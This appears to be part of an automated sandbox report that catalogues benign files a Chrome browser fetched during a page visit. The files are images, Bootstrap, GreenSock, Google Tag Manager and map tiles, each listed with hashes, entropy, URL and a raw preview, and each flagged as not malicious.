                                              SSDEEP:384:4YNg7ZcCKlsLgKi2+LoOxcpIajFZYkTpo13:4Yy9cCjcsOrajFZzo13
                                              MD5:D8FDCAED0C4EA58B05338500AE294B6A
                                              SHA1:73A059DB460A45B0ACD499D0BE98777E3327C727
                                              SHA-256:99C626D274984B458785BD34D54855865845D6FECC42F01AD521D72C7D40A54E
                                              SHA-512:3DA0523307EE442D040EE70B363ADFD17BF6E88F147838D604F84C677B74B46D822D659C5F216E819CF6BEB36391DC9C9612DCACCF2BE26239974EBD017EA6AB
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/62/545999c9a14b638f839c1e7d157814f2.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):13896
                                              Entropy (8bit):7.981316345911421
                                              Encrypted:false
                                              SSDEEP:384:06sbcUpwB3jHm5R/cOURbUgGntRmqiusv:Eu3jHYde7oRnk
                                              MD5:44CCBD51C611071BE4E1C5A10A10F2D3
                                              SHA1:280F22FC1CDF80E17A0711A39C7428BD06C93906
                                              SHA-256:C2918CD7EFEA464A642AA0238F3D71CD65EA02B75ACAE94D6A8C2AA128C30ABB
                                              SHA-512:76B13DD5DFFE89FD4381849ACFEDFE13063822CAD54BB46A2A980A66B8199EDFC96F0E83C218473E9075BA1BAE8AA0A08435DCA5FD50CA1277919DB004206E74
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF@6..WEBPVP8L36../..?... ..&....B."Q.;.'..p[....K.....2.......d+....C..!.w}z.............T...(d .dH..I.K. .A..Q..`.J#(D_..j.,......vJ....p1..{3..9.v......S1X..I..7.o]Z..f.[....1E..FY....5.:g..Z.....5.dk.!.$........._.r..2...1.R.........m.m.C.N..x.\\....]..........\.u...J.9'(s.}.}.CI...J........?...R;.u6""...d..2.\./.{W..........GH....d/.d..+..?.....+St#....._...~..h.\.(......./....:[.p..q.*.d......CY..#+.E..K0H.\....V.f.zA..8.g......*O.....W.!..Q/%.6.2w...^NuY.Rc..+..2Aru..Z.#.+k.>.w.{.*.ne.......1Cq....9\U._....p..\.3.........e...IE...../.........xo...pp.2..e.oX..UK.c.[..U........Y......U.#Q...\g...IY..;...F....l..C..g.....#.&..!3\-.}....b0R.8.....-.j..*.Arq..,..!..5.r..8T_..Ne..%m.*_.._.Q...0.M".2.U...^qf#+N...l...9[.;!..z'7.ul..rc..H.Df.#..v.:i-.f6..K..g^.....Yu..^9p..4..Y...v.....R..B.jIv.>..c<G.|.u..%.............w97....Cp.D..&x.$."../.z.....pOr...F..7.6.n%F..5L..`4d....5.+LU..m..Y;...r....\...=*BC...wp..V.S...0....m.1....6v6.9T.j
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3264
                                              Entropy (8bit):7.920271728606511
                                              Encrypted:false
                                              SSDEEP:48:Z/NuKfJH716Axc3CvFtSEsIEoY8356yLEEPib2AY+xeLz58qeN1rVpdMqfQw2uIe:t5h6UmCdQn5oEe9DAY5hO1rHKqff2G
                                              MD5:FD1D38BDF5AA692DCED62CCA08C7DE36
                                              SHA1:FBE73E7ABA5DEF05431BB0BC5AAECE4B3DC75ACA
                                              SHA-256:EE6DAD81326441809F5ED2C86DF9E8F779B060A75CE8D65BBBB44BD9DD66FD2B
                                              SHA-512:C0CC0D5EAC6F0861CD32C736734E13C1F3E6F3B4AA7728D3EAA9915DAD5DB2749A6F5F0381ED844A873EDAE07DD5242E90291974EF61193D4130AB2BA1D660DD
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE......9|.@s.Cp.............<w.1........"..)...........0.....Co.......)..Jj..........4y.>j.@_..........3z................<...........M]..........'..2..Z.........................2..z.....b..B........s..@..?..M.....Zp.\..$..........@..c..;.>.....IDATh..k......HD....&a..:...E@..N...;.V.v.L.9....Kq+V.g.U..0..?.....x5..&.K4.....I..n.A..}8[.&.q....=x...q....:M....B...d....,...U...)...P{LB.Q. ...I....N2Se&o..$...........;.z.`.t....-........7.}.v3..1w.....y...G..=>.7..d.R{.g..5...N.d...3.+.....w.........8:_....z....?..u...7.vX....2.....-.dw.<.0...G.Oo../.....}..]...o...wW...>.......t&..8.2.q.J..\^..;fw....)m..m...K.|7....;.I..-7...q...........g..F...y.Q....r.}............t4....5.R.88$..Na.....9..xN..u{.|D!.0r`.....}..F.m.........T.b...~...r...iH.k..c.....9...pGt.u.sp.&GB.q^..[..0v.^....>g.!2.!'r.rSo.blp.t.m6$.Z.t..) |..L...a..#..}.......;.H......vu...n(....5..v..n.........t.h}R.......!.p.d....>.pw.....+.........
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (15208)
                                              Category:downloaded
                                              Size (bytes):15590
                                              Entropy (8bit):5.522003918487033
                                              Encrypted:false
                                              SSDEEP:384:trEawZ1w8LNjr4lQWszZus4/CaCKgiLEG:7wvRmj+aCKgiLh
                                              MD5:60144315C1CFB721751584D3EFAFC958
                                              SHA1:21441FBC79208A2DE2BD63156F5805B21B450522
                                              SHA-256:598794CF8CA8FD2A48D013A06D8E153B34532A49F5F5D5890EA0E220C0275EEE
                                              SHA-512:2705310B61F919ADDD6623742EBE572F74731F695DE00AE782972A19D60CCF0332A4F8819FD2C249E1E73844F56BDAAF816E4ED8B3BDDCAE8AE2B92B73E67FB8
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/SplitText.min.js
                                              Preview:/*!. * SplitText 3.11.2. * https://greensock.com. * . * @license Copyright 2022, GreenSock. All rights reserved.. * This plugin is a membership benefit of Club GreenSock and is only authorized for use in sites/apps/products developed by individuals/companies with an active Club GreenSock membership. See https://greensock.com/club. * @author: Jack Doyle, jack@greensock.com. */..!function(D,u){"object"==typeof exports&&"undefined"!=typeof module?u(exports):"function"==typeof define&&define.amd?define(["exports"],u):u((D=D||self).window=D.window||{})}(this,function(D){"use strict";var _=/([\uD800-\uDBFF][\uDC00-\uDFFF](?:[\u200D\uFE0F][\uD800-\uDBFF][\uDC00-\uDFFF]){2,}|\uD83D\uDC69(?:\u200D(?:(?:\uD83D\uDC69\u200D)?\uD83D\uDC67|(?:\uD83D\uDC69\u200D)?\uD83D\uDC66)|\uD83C[\uDFFB-\uDFFF])|\uD83D\uDC69\u200D(?:\uD83D\uDC69\u200D)?\uD83D\uDC66\u200D\uD83D\uDC66|\uD83D\uDC69\u200D(?:\uD83D\uDC69\u200D)?\uD83D\uDC67\u200D(?:\uD83D[\uDC66\uDC67])|\uD83C\uDFF3\uFE0F\u200D\uD83C\uDF08|(?:\uD83C[\
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):32144
                                              Entropy (8bit):7.992932255215369
                                              Encrypted:true
                                              SSDEEP:768:XHnBGF4BysbQHIRqvJhuw+I17fLKJfXMOM5vsaapAAXrZgzRIwPA:3BGqByJHpBZ+IgNcOuUP6AXSWwPA
                                              MD5:856C8182E1172AD67041E6E9C3C26BB3
                                              SHA1:C14C13358D9D8513CB93F37BBC50F781D7CF413A
                                              SHA-256:6C61E316E9BE71BA6B257B3A57DE24D4FAD795D037B1F07BFA7A186E31E7E7B3
                                              SHA-512:C7C4E031479973CC92EA137D4C6A7BD7464AA62F62F340E3AFE341D5AF093161BD29D9049A461A396FE92F9622CA020648A59687D7DCD7B521C49F6942A58421
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/16/f2e9aef4e6dba3f5ab1fba99f80ec53b.webp
                                              Preview:RIFF.}..WEBPVP8X..............VP8 .}......*....>.p.T)&4.....0..gn.............VmzDxG=o(..|...w.....Zy.~i.y..D.....n..7..vv2....._.7C.1..~.~..$.f=..b..d..?./....../.....a.......:......%..yB?.yg....O..G......L.......T=L.d %C..pr.[Y....(.<...R......2.S1...!.D.....K.:=.....u..;!.H...r.x!.f.p.eP.....'.g...XZ.\.q$[2...4.P..|=AF..83{..|.............7..%.;..,......Ki..\9.f.ScD..........Ng..A[.}......R#SNY.....'..../v........:.<..........Xa....rK.F_..........x:......h.M..e..8]..{...B.p.Uz`.....z...{!..*.cp.z6m.L7~..p.|1T{:D....l.I.M...@..p.Kby.1D:....3.&........%...'.1g.....X.L..^W.&...x.....{ .AP.@.. %_..\.R2a=..M..r...Y..|..)u.l.w.....Q6...0L!.7.*.T6......t=GC...6...N...G.%..e.1..%...3.e.(..o7...}.G..`C..m.......wJ..+4...5Qe..Dd..9.T=c..W.O.<M..... ...+.....c.n.....?..~.H....,cq8<iO?5..?zT.4.@~.>...6......n^...K..SQ'..l.C.R..F.K!.5.S..u..J....R2..Mi..FC9.=q...;.jeG%.....)u3.9......[.Y~...W".$1..sVGo.....]$...D...ac. ...4i.g.K.;.w....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 1000 x 1000, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):136372
                                              Entropy (8bit):7.975260597649899
                                              Encrypted:false
                                              SSDEEP:3072:ocL5x71bJqs0l0N7vdtAaPQ9MvWltEX69skok:oILb0s0l0N7VtAagUKt
                                              MD5:31F87B036F7F4902D986EEAB3363AB00
                                              SHA1:11036556CECDE7340BBA53046CA1ECC74821B607
                                              SHA-256:6BD5B17045C182EB591BBB16F28C1B77509832235646F0CBB02DEB67F0B11C03
                                              SHA-512:7685BA42CC0BC17CB0FBC36302D26FE64E7F36A2D2BF516239476C281C29976268FD102BAE91536E81131B0F5000133F6DCAFFBCC918FCC68AD406A649F2B876
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/cta4.png
                                              Preview:.PNG........IHDR.............z}$.....PLTE...%..g^\+#.6-)@73...NC@...]QNk_\EAD...ndc..~...#*8EHV.{y.ro.=.xjh.2focb.D..9rg\Z.1n.K.PFDMECD;9:30/X.......vy.*(&Bm.^_kAm..;.......?;-VQCJE640%...*).lgTa]L....H.wp\....wd....k.].v.f..|X.pM.#.................U.SG6......xG)..gF.aA...[<....T5.}........r...d.....B'.(b.Wz..M/.T..\.p..lC'"W.3_......{..@\w`>&7i..K.K1......U9"~.......:}..Df..oGq.Q[l$Jl.N}9AB5Rl.Vz'9F.7Qq..cv.Qe{BKOSn..=_.~rCTc%BY-34.F.5J]..Dfl|.BoRVXsz._bi...eJ5.}c...nkj.........mS{wz..yT;.......y......)tRNS........'..):HaP9Vr..ti.~..l......}.).I....QIDATx...1.. ..A..?ZT.X*.*p.6.............[.^......2...(....7...a..n......JH......&..,#f.e..~@..BO.v..g*o.5...G...X=7.w.....O[.n...<.Cw+.P....._.f.a...c....N..A...a.;..R.w.M..*u..y..t........8...L..vjC.u..v.:.0...;.>..............r...........YCo...S..F"Zc..X.6.....%G]...s..h.[.7.w..V9.#O.$I.4..8.S.9....<....N.R..7.......F..8...\..eB.QT....?>.Q..?b..eD.D$^..w.......n./.....t...p.H
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):12566
                                              Entropy (8bit):7.972478873956739
                                              Encrypted:false
                                              SSDEEP:192:UIIHUCD4wabgPHuAgp/sfw0A7J186choVQhXhxPIFGMbdyKrxZLdbJmr:K0w0g2bp/WYSzBhP+5bdyKrxtmr
                                              MD5:04202A673C2DEDB09A8D28D7ECB9BF84
                                              SHA1:5A168318742602C9FBC259D8B85E25C78B2E334F
                                              SHA-256:84924C97AC80915F08F76E473A7550CAB39329977DFC5565E05228A5EA8FF46A
                                              SHA-512:FFE293668D4CF1675CB99B274213F15EAC6933F1AF183430D119EEE477C6C161A5126ED61C28C50648D0322B485CBF2F9351DBD7C6B6224ECD3402E552E61F88
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3403
                                              Entropy (8bit):7.9138281864818225
                                              Encrypted:false
                                              SSDEEP:96:GAtGT/yKWD1DyPiU5NfwYZybAnFoyi+ZPoo2:XtGTlW9qiU5NfwlbAFosh52
                                              MD5:403F1A70A16E4C4F731D846D382AACCD
                                              SHA1:D73DE002294E0BB89A4458B016EEC5B415A83EED
                                              SHA-256:A5419E434CB77652BDD8A0C329B980A523D34D334688B25580BA597EA0F8FFAB
                                              SHA-512:D5C70A0C302EF9969EC5A2A196A308B5144F80EACB3BFF4E3EA429B2CF5AE6D93D140291677721B61817E31D91FF4E6FFEF4F992EF711C5DF57B802B90366A5B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/m-365.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE....;...............5.8..5...........n.....]..."....>..............D..K..8..f.....w.....=........<.....V..4..|S...........1......?o.P.. 3.......1Q.7..C{....J.........'.5Z..........&=..!.......D..O..+F../.:g..(.J......................L.....)F.......8f....].......}.H.....+..........%2...v..Em.....r.........3Z."..S..!...,..............N!...V.......Z=.k..qn..i...R\..........E!.D...(.F....7=........:B.Zk.iM.AC.pl."(.Y..7..8\....PIDATh..[.......k...%.....0.....UY.uA.)je..ZG;3N..V.[.M..v.?..9.\..+~...y.;.9..E]R.+...(A.Y.1).0.-.A.S.IE.%(...F!.E.(.... .2/$...%$.....$.. ...DQ...3...}.......$O.H..D..Z...1h8#...}.....?[s...8.W..zIpGpCd1...........?.^.z.&.$...c0H...g.E......x....w/.....^............9........._.....I.Z.G1`..qg..s`.'....YVW...o......NNC.D........!(..`#.....R.Cb0(.....)]..xH@.".8:....a.(...........C........B.Y..UI....&..P^...n...89l.......$.XU_/...$...;.q...t....B......\......W.Z.7..Tp.O..^.r..@L.e.s....".A.V6
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):5378
                                              Entropy (8bit):7.908415159229798
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/xZSRuCCpKmYnb+HjIecW3:UIIHUCD4wa3SRJCvY+IS3
                                              MD5:84D7BC34CED2F205F776CEE8C79C181C
                                              SHA1:40C6F8C6FAB2BCE145EFAEEFC6A948C7E71B1A36
                                              SHA-256:84CA4A564829EEC13EBA7B2123737CA1E7A397AA3EDB77CE311E0352FD8E029D
                                              SHA-512:E5ED2E7691CD277F41A43E66444673D957A42026459C25B77676353BABE959001911FA7F3B1DEC36C2B09442B4D8E509802ECA7C1FBD16D4A4D0074002533840
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):18760
                                              Entropy (8bit):7.986328780802582
                                              Encrypted:false
                                              SSDEEP:384:b9QhijLMYYhTr/yCMCaQxpNgemRORvVaQqXjuZXPP5no7++ViduCEvdr:JQGC/yeaYMem0baQqXjAn5o7vEgCwdr
                                              MD5:5CBA1155894F83C1242EB0F73BAE8589
                                              SHA1:B439FA09C3617810BAE0622CA02B3BE8A9291B46
                                              SHA-256:8FC8DC8DFC932D6E228C43570E38F9095EC7A42F84497C28C580CC01D44A55AE
                                              SHA-512:F9894583D557C049EC3A8C6D210BC0F2A99FAD60DF177944E30BA0169130B9513603968B305EB9A6A727DA5A0C822032F50BB5765672F229CA38E98B25DEFC91
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21414!3i14012!4i256!2m3!1e0!2sm!3i707457629!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=35509
                                              Preview:RIFF@I..WEBPVP8L3I../..?._.6.mU...n.CD..M7.t...9."M..m[U...p.@..@P..?w.+...(.mW9...=[...?xCB...9..4.H.C.4.EP5*L.D..0...TMUZiA.3.d..H....-m....b....h..0.--......../~../.?..~.....Ez2..$9x-...E.....D....@iz7U......4.n.h.......3.L..1g...5g....u....%.B...8k@9..?&E.lQ.(..b.!k...~0q..t....V]...o..'....$$.|.r. .. ..jgV...t:....DE`}.QP....?..k.>._WD.!..6z.kC.mb...~..Q.>.8.k...pjZ.>.h......6.k.....n..9..#^O..xd:.e...h..8.g.7a46k.....l...Z.S......f..5C.s.;F.....j[.'............/.{.....S.......x{9.....;....~..m...[.x.6.>..!..0..9.-,...0.....<.f0X\..............B..c.57.......:..\}.7....f8A..8..l...M.....>.:x...l.._....6.!..(,.q2........3.)J.......f..^..7c..H..>f0+.l..*.].'........ .H.v3............#!.hv|..`@..x......./.......<....t......S``..|......t..t|..Hj&.V-Y....vY7....2zO..P.../..V...Q.$.dJF..5;_..+.V...!-.'.#..}fd.....w..b..1...YF....k.....A..2Z.....&..p....^..AC..#....,..k9fI3..h.....8...k.I........Us.S.r...k.v...F../..._>n.`?.V"..._...[..IR..ri..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (2345)
                                              Category:downloaded
                                              Size (bytes):205876
                                              Entropy (8bit):5.533533953095401
                                              Encrypted:false
                                              SSDEEP:3072:L7ax8eulMYeHCeG001lvol0VQbQwM87NzgOsEemtJeNoZzVJ4D:npmF8li0Ud7DsEemveeZU
                                              MD5:025DD904F76F766A8C5F8A22589108C4
                                              SHA1:BACA93E06F31093EFF9F92E6F5302902E971B70C
                                              SHA-256:51AC541058DAB3C5F9161C980D11AC27865CC2EDA0AA9BDF1B87796BB873D170
                                              SHA-512:6F1BA0CBF2893DE0387D012FC9D4C6CB2A9EA3DB4A8FD1C41E1D02A70E1FE74D0CC330B0D92792D2D2EEB40729CAEA8C8F8A3FAE65098409F1DB6BA51428BA9E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.googletagmanager.com/gtag/js?id=UA-64826612-1&l=dataLayer&cx=c
                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__cid"}],. "tags":[{"function":"__rep","once_per_event":true,"vtp_containerId":["macro",1],"tag_id":1}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0]]].},."runtime":[ [50,"__cid",[46,"a"],[36,[17,[13,[41,"$0"],[3,"$0",["require","getContainerVersion"]],["$0"]],"containerId"]]]. ,[50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. .].,"entities":{."__cid":{"2":true,"4":true,"3":true}.,."__e":{"2":true,"4":true}...}.,"blob":{"1":"1"}.,"permissions":{."__cid":{"read_container_data":{}}.,."__e":{"read_event_data":{"eventDataAccess":"specific","keyPatterns":["event"]}}...}....,"security_groups":{."google":[."__cid".,."__e"..]...}....};.....var h,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{d
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65293)
                                              Category:dropped
                                              Size (bytes):79742
                                              Entropy (8bit):5.18245217940784
                                              Encrypted:false
                                              SSDEEP:1536:2JC+tkTbR2t4i+AitLJLr2gykHgWskGvD/mZLwoZ0ea1sJBTR:suBQkGjmZLwoZ0eisV
                                              MD5:6DAE88ABA81E468737C510CC2E4EC1DD
                                              SHA1:6B4B985A90ABD7AB1C2E35FF3B874D07CF8410EE
                                              SHA-256:2515E37EEE31F5EF3D659B21DCC84DC6EA732B06872DA51078B5B526DE34C0C1
                                              SHA-512:9DDAEB47DE0F5B7724680BEF5AB033462E495A317BD7F3F0ED3952A3A8EE74034E1429B3D1DFB4604FAA2066A64514A75734AF2321ACE014EDC85326DCC4FF72
                                              Malicious:false
                                              Reputation:low
                                              Preview:/*!. * Bootstrap v5.2.0-beta1 (https://getbootstrap.com/). * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e()}(this,(function(){"use strict";const t="transitionend",e=t=>{let e=t.getAttribute("data-bs-target");if(!e||"#"===e){let i=t.getAttribute("href");if(!i||!i.includes("#")&&!i.startsWith("."))return null;i.includes("#")&&!i.startsWith("#")&&(i=`#${i.split("#")[1]}`),e=i&&"#"!==i?i.trim():null}return e},i=t=>{const i=e(t);return i&&document.querySelector(i)?i:null},n=t=>{const i=e(t);return i?document.querySelector(i):null},s=e=>{e.dispatchEvent(new Event(t))},o=t=>!(!t||"object"!=typeof t)&&(void 0!==t.jquery&&(t=t[0]),void 0!==t.nodeType),r=t=>o(t)?t
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):5866
                                              Entropy (8bit):7.960716266838465
                                              Encrypted:false
                                              SSDEEP:96:VMjYPtCTvp4gQn/sVdc+ilLo9P67vdy5G0o2/BolszmSL4u5XBy5w1YwqScC:9sTp/qsVO+im9Uc5GrWolnSMujy5w1tb
                                              MD5:F7EFDBBEC224B88B48DB0EAD14CB9BCA
                                              SHA1:921038A262EDE3C6023B10D2B3BECF4A3B47E530
                                              SHA-256:AFBF99FA9BA07134B16EE2F0EE72E16AFF365B4C2F4225F2E11755EF6952FB50
                                              SHA-512:6163FA38C4379EC9C3503584B173CDB62E8B2EFD62CE89C265BECDD7CAF2748DB736C2FD86857D019068F815A0F5701940194E3386FF906CB390AA9D3842D1E7
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/portfolio.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.T'SE.................}g...TF.QA.QC.MD....WI.!.}..........~mWH..xa.xW..B..E.U(...$...S.UF..R'.X4L>.............MI...H....R-..EKF........M..3nJ.OC...<J>..}dXC.yW..{j..>ZA..~b..|\N........N+.R......o..........o..nX?...x......JK.WF.....SV...]S......g....kJa>.....zs._fI@.OI.E:....Lj..Z......UJ...2.kU....mX........s.........YB..r\.......T.ZN.dJ..........F>......O..l .........L%...QM....{.....f[....D8...{.....R......T=.l`............G...x.SJ.....@..a..|.Z"k]...7.qlO;...-...D....s......un.y....{..l..I.....i.......d/...t........rL5..h.......{M........R........f....B..7..]....dA{..o..S....f............yQe..ykRt..tV............g....]..}}.vT..E..HV.m........g........px.m.....RBv.{..co..hoi?IL.=.\..;.tB.o.L..[7+z...(.jm..[..W...t....rGA..a.f.Z....IDATh..}H.i..'.......D.&.hL}..61h..e5..M.&..Q.d.b...P]=m0T]|..i.@=.x.-TK..-k..X....v.n....._..?..{&..5.}.<Of2.|...<.......n.Ir~.$.{.J....a...LT(..F...}.w.U.l...P*....q..p.a.>."...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (543)
                                              Category:dropped
                                              Size (bytes):120870
                                              Entropy (8bit):5.4575471164937355
                                              Encrypted:false
                                              SSDEEP:3072:LQK1aO3dKplMGqy2ETMoojAZ1TiEyurrkQ0Fuf:0SF3dKp+GqyHTMoojAZ1TiEyurrkQ0FK
                                              MD5:A08CCAE580D68E61749A4F108AF246D7
                                              SHA1:52D8EA25808764F8BB0023D05172CE68659C92F4
                                              SHA-256:F3811A81A2BBF1513B652DED3FD2E4BD00457536238C5F47185C81FE57C06D16
                                              SHA-512:DA9DFDCDBBA510AC71F13A3B33C8B06C71725FF5C5C6448F481BB217F31132CEE6E97CEB3A42F9A3173C4521853FBD6D31580FBF466A5598C58EEDBE982D9D0E
                                              Malicious:false
                                              Reputation:low
                                              Preview:(function(g){var window=this;'use strict';var d7=function(a){g.xk(a,"zx",Math.floor(Math.random()*2147483648).toString(36)+Math.abs(Math.floor(Math.random()*2147483648)^g.Ya()).toString(36));return a},e7=function(a,b,c){Array.isArray(c)||(c=[String(c)]);.g.iha(a.D,b,c)},Erb=function(a){if(a instanceof g.jn)return a;.if(typeof a.Im=="function")return a.Im(!1);if(g.Ra(a)){var b=0,c=new g.jn;c.next=function(){for(;;){if(b>=a.length)return g.p1;if(b in a)return g.kn(a[b++]);b++}};.return c}throw Error("Not implemented");},Frb=function(a,b,c){if(g.Ra(a))g.kc(a,b,c);.else for(a=Erb(a);;){var d=a.next();if(d.done)break;b.call(c,d.value,void 0,a)}},Grb=function(a,b){var c=[];.Frb(b,function(d){try{var e=g.Jp.prototype.B.call(this,d,!0)}catch(f){if(f=="Storage: Invalid value was encountered")return;throw f;}e===void 0?c.push(d):g.mma(e)&&c.push(d)},a);.return c},Hrb=function(a,b){Grb(a,b).forEach(function(c){g.Jp.prototype.remove.call(this,c)},a)},Irb=function(a){if(a.oa){if(a.oa.locationOverri
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):83836
                                              Entropy (8bit):7.997290805659413
                                              Encrypted:true
                                              SSDEEP:1536:ogm0K6KgxAKO1BqJTMxX0qBz6dHFqdEVCQfxV6onxIup+dOYGYbz0VqXIudPK:oNqKgx/BM+gWlOXQfzFodnz7XIudS
                                              MD5:5E9DF5C6B4B5E19BA894605F2999AC96
                                              SHA1:D82FD5225004FF56D5A0FBD748F94122D6C1C5D2
                                              SHA-256:5ED8A37A5FD400417AC7B0FE2EBB11AF28553E9D4C795A711FED95F921736B3C
                                              SHA-512:E0CBF108224847EA788E08755BB242E43CD9231B80644AEB98A5813DEED566A9EBF0F53A337E338B610D76389083F0AD0A80E4BF8B044BE265BFE02D7ABEBED4
                                              Malicious:false
                                              Reputation:low
